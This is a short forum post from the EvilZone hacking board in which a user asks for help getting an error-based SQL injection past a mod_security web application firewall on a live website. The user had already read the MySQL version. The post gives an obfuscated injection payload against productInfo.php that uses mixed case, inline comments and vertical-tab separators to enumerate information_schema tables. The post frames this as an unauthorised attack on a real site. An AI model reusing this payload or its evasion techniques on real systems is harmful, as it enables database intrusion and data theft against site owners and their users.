EvilZone

Hacking and Security => Hacking and Security => : hppd January 27, 2014, 10:42:41 PM

: Need some help with Obfuscateing SQLi queries / bypassing WAFs
: hppd January 27, 2014, 10:42:41 PM

Hello when I was trying to exoit a website with error based sql I always got a

Not Acceptable!
From mod_security.

Well not always, I could check the MySql Version but when I tried to get into the dtabase the fucker didn't want to do it anymore..

This is how far I went with obfuscating. I really don't know what I can change more to bypass the mod security.

:

productInfo.php?iid=1467%2f**%2faNd%2f**%2f(cAse(suBstR(se%0BLe%0BCt%2f**%2f1%2f**%2ffRoM%2f**%2f(sEl%0BeC%0Bt cOuNt(*),cOnCat((s%0BEl%0BeCt(sEl%0BeC%0Bt%2f**%2fcOnCaT(CaSt(0x64617461626173652829 %2f**%2f aS%2f**%2fChAr),0x7e))%2f**%2ffRoM%2f**%2fInfOrMaTioN_sChEMa.TabLes%2f**%2fWhERe%2f**%2fTAbLe_sCHema=0x64617461626173652829 lImIt 0,1),FloOr(RaNd(0)*2))x frOM%2f**%2finFoRmaTiOn_SchEmA.tAbLeS))